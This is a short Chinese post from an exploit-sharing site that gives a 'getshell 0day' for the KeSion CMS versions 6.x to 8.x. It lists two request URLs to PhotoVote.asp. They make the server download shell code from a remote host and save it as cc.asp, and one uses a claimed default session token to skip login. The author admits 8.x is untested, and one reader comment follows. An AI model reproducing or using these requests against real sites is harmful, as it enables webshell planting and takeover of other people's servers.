漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

科讯 6.x~8.x getshell 0day

利用比较简单,登陆后访问

http://xxx.com/Plus/PhotoVote.asp?LocalFileName=cc.asp&RemoteFileUrl=http://xxx.com/157501.txt

成功会在Wap/Plus下写入cc.asp,并返回文件名,其中的157501.txt为shell代码。。
ps:禁止转载,6.x~7.x测试存在,8.x是我加上去的,没有测试,应该存在吧
有的朋友说鸡肋,那就不鸡肋吧:

http://xxx.com/Wap/Plus/PhotoVote.asp?LocalFileName=cc.asp&RemoteFileUrl=http://xxx.com/1.txt&wap=76650e3cd0279d4d5fa6c99ad5590

其中的wap=76650e3cd0279d4d5fa6c99ad5590a30是登陆后的验证码,相当于session
这个东西wap=76650e3cd0279d4d5fa6c99ad5590是默认的。。。。好了不多说了。

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » 科讯 6.x~8.x getshell 0day

评论 1

  1. 还是不知道怎么利用

    tbhu 2013-04-05    回复